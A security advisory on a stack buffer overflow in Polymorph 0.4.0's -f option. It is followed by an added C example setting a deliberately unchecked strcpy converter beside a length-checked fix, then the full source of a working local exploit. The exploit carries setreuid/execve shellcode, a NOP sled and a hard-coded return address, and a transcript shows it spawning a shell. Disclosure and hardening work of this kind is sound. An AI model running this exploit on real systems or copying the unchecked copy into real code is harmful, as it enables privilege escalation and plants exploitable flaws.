-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

01100011 - code 'security research team'
- ----------------------------------------
- - http://www.c-code.net
- - Advisory and PoC exploit by: demz // demz@c-code.net
- - Vulnerable source: Polymorph v0.4.0
- - Bug type: Stack overflow
- - Priority: 3
- ----------------------------------------

[01] Description
[02] Vulnerable
[03] Proof of concept
[04] Vendor response


[01] Description

Polymorph is a filesystem "unixier" (a Win32 -> Unix filename converter).
When downloading images from Usenet, a lot of filenames are mangled by MS
Outlook and other, less caring, newsagents. There could be files with
strange names like

    C:\\PIX\\HUBBLE\\Eagle\ Nebula\ 0532.JPG

and this, of course, is unacceptable. Polymorph looks in the current
working directory and finds strange filenames like this. It then renames
the file after converting all the characters to lowercase and trimming the
cruft from the original. The previous example turns into

    eagle_nebula_0532.jpg

which is much more useful.

Polymorph contains an unchecked buffer in the "-f file" option: the
filename given as the argument is not length-checked before it is copied
into a fixed-size stack buffer, so an overlong argument overwrites the
saved return address (the PoC below places it at offset 2076). This can
be exploited very simply.


[02] Vulnerable

Vulnerable and exploitable version, tested on Redhat 8.0:

- - Polymorph 0.4.0

Prior versions may also be vulnerable.

Source can be found at:
http://chromebob.com/proj/polymorph.html


[03] Proof of concept

[demz@lab polymorph-0.4.0]$ ./c-polymorph

Polymorph 0.4.0 local exploit
---------------------------------------- demz @ c-code.net --
polymorph had trouble converting ?1À1Û1É°FÍ?1ÀPhn/shh//bi?ãPS?á?° Í?1À°Í?????Á% to 1À1Û1É°fÍ?1Àphn/shh//bi?ãps?á?° Í?1À°Í ????? ðóÿ¿... the file is now possibly corrupt
sh-2.05b$

The garbage in the error message is the NOP sled, shellcode and return
address being echoed back; the shell prompt after it is the payload's
setreuid()/execve("//bin/sh"). The return address hard-coded in the PoC
(0xbffff3f0) is specific to the Redhat 8.0 setup it was tested on and has
to be adjusted to land in the NOP sled on other systems.

A proof of concept exploit can be found at:
http://www.c-code.net/Releases/Exploits/c-polymorph.c


[04] Vendor response

The vendor is informed.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+zTzZ8ToiGqnwMzARAphBAJ9L+MOY5R5arOeb1slTXeNgYAgwsgCcD8od
IwAUN0zzl8ZhkfZN5judNNY=
=oc09
-----END PGP SIGNATURE-----
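The bug class the advisory reports, next to the check that prevents it, as an added example written for this page; it is not Polymorph's source (which is not on the page) and not c-code.net's code. The unchecked converter is a hypothetical reconstruction of the pattern "fixed stack buffer, no length check on the -f argument", NAME_BUF is an assumed buffer size, and the conversion rules (strip the path, lowercase, spaces to underscores) are inferred from the advisory's single example. The hardened version refuses a name that cannot fit instead of copying it, which is the check the PoC's 2080-byte argument would have run into.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the fixed destination buffer; Polymorph's real value is not on the page. */
#define NAME_BUF 256

/* Index just past the last path separator (Win32 '\\' or Unix '/'), i.e. where the basename starts. */
static size_t basename_offset(const char *name)
{
    size_t start = 0;
    for (size_t i = 0; name[i] != '\0'; i++)
        if (name[i] == '\\' || name[i] == '/')
            start = i + 1;
    return start;
}

/* Lowercase everything and turn spaces into underscores, as the advisory's example shows. */
static void unixify_in_place(char *s)
{
    for (; *s != '\0'; s++)
        *s = (*s == ' ') ? '_' : (char)tolower((unsigned char)*s);
}

/* Vulnerable pattern (hypothetical reconstruction, not Polymorph's code): the -f
 * argument is copied into a fixed-size stack buffer with no length check. With
 * strlen(name) >= NAME_BUF the strcpy writes past tmp and over the saved return
 * address, which is what the PoC exploits. Only ever call this with short names. */
const char *unixify_unchecked(const char *name)
{
    static char out[NAME_BUF];
    char tmp[NAME_BUF];

    strcpy(tmp, name);                          /* unchecked copy: the overflow */
    strcpy(out, tmp + basename_offset(tmp));
    unixify_in_place(out);
    return out;
}

/* Hardened form: reject input that cannot fit (with its terminator), then use a
 * bounded copy that always NUL-terminates. Returns NULL for rejected names. */
const char *unixify_checked(const char *name)
{
    static char out[NAME_BUF];

    if (strlen(name) >= NAME_BUF)               /* no room for the terminator: refuse, do not copy */
        return NULL;
    snprintf(out, sizeof out, "%s", name + basename_offset(name));
    unixify_in_place(out);
    return out;
}

/* 1 if a name of n bytes is rejected by the checked converter, 0 if accepted, -1 on allocation failure. */
int rejects_overlong(size_t n)
{
    char *name = malloc(n + 1);
    if (name == NULL)
        return -1;
    memset(name, 'A', n);
    name[n] = '\0';
    int rejected = (unixify_checked(name) == NULL);
    free(name);
    return rejected;
}

int main(void)
{
    /* Constructed sample: the advisory's own example filename, without the shell escaping. */
    const char *sample = "C:\\PIX\\HUBBLE\\Eagle Nebula 0532.JPG";

    printf("unchecked: %s\n", unixify_unchecked(sample));
    printf("checked:   %s\n", unixify_checked(sample));
    /* The PoC passes a 2080-byte argument; the checked converter refuses it instead of overflowing. */
    printf("2080-byte name rejected: %d\n", rejects_overlong(2080));
    return 0;
}
```

Rejecting rather than truncating is deliberate: a silently truncated name can collide with an existing file, and the rename would then clobber it.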
/* c-polymorph.c
 *
 * PoC exploit made for advisory based upon a local stack based overflow.
 * Vulnerable versions, maybe also prior versions:
 *
 * Polymorph v0.4.0
 *
 * Tested on: Redhat 8.0
 *
 * Advisory source: c-code.net (security research team)
 * http://www.c-code.net/Releases/Advisories/c-code-adv001.txt
 *
 * ---------------------------------------------
 * coded by: demz (c-code.net) (demz@c-code.net)
 * ---------------------------------------------
 *
 */

#include <stdio.h>
#include <string.h>             /* memset, strlen */
#include <unistd.h>             /* execl */

/* Linux/x86: setreuid(0,0); execve("//bin/sh", ["//bin/sh"], NULL); exit() -- no NUL bytes, so it survives argv */
char shellcode[] =
    "\x31\xc0"                  // xor eax, eax
    "\x31\xdb"                  // xor ebx, ebx
    "\x31\xc9"                  // xor ecx, ecx
    "\xb0\x46"                  // mov al, 70      (setreuid)
    "\xcd\x80"                  // int 0x80
    "\x31\xc0"                  // xor eax, eax
    "\x50"                      // push eax        (string terminator)
    "\x68\x6e\x2f\x73\x68"      // push long 0x68732f6e  ("n/sh")
    "\x68\x2f\x2f\x62\x69"      // push long 0x69622f2f  ("//bi")
    "\x89\xe3"                  // mov ebx, esp    (ebx = "//bin/sh")
    "\x50"                      // push eax
    "\x53"                      // push ebx
    "\x89\xe1"                  // mov ecx, esp    (ecx = argv)
    "\x99"                      // cdq             (edx = envp = NULL)
    "\xb0\x0b"                  // mov al, 11      (execve)
    "\xcd\x80"                  // int 0x80
    "\x31\xc0"                  // xor eax, eax
    "\xb0\x01"                  // mov al, 1       (exit)
    "\xcd\x80";                 // int 0x80

int main(void)
{
    unsigned long ret = 0xbffff3f0;     /* stack address on the tested Redhat 8.0 box; must land in the NOP sled */
    char buffer[2081];                  /* 2076 bytes sled+shellcode, 4 bytes return address, 1 NUL */
    int i;

    memset(buffer, 0x90, sizeof(buffer));           /* NOP sled */

    /* drop the shellcode in the middle of the sled */
    for (i = 0; i < (int)strlen(shellcode); i++)
        buffer[1000 + i] = shellcode[i];

    /* saved return address sits at offset 2076 of the -f argument; write it little-endian */
    buffer[2076] = (char)(ret & 0x000000ff);
    buffer[2077] = (char)((ret & 0x0000ff00) >> 8);
    buffer[2078] = (char)((ret & 0x00ff0000) >> 16);
    buffer[2079] = (char)((ret & 0xff000000) >> 24);
    buffer[2080] = 0x0;                             /* terminate the argv string */

    printf("\nPolymorph v0.4.0 local exploit\n");
    printf("---------------------------------------- demz @ c-code.net --\n");

    execl("./polymorph", "polymorph", "-f", buffer, NULL);
    perror("execl");                                /* only reached if ./polymorph could not be started */
    return 1;
}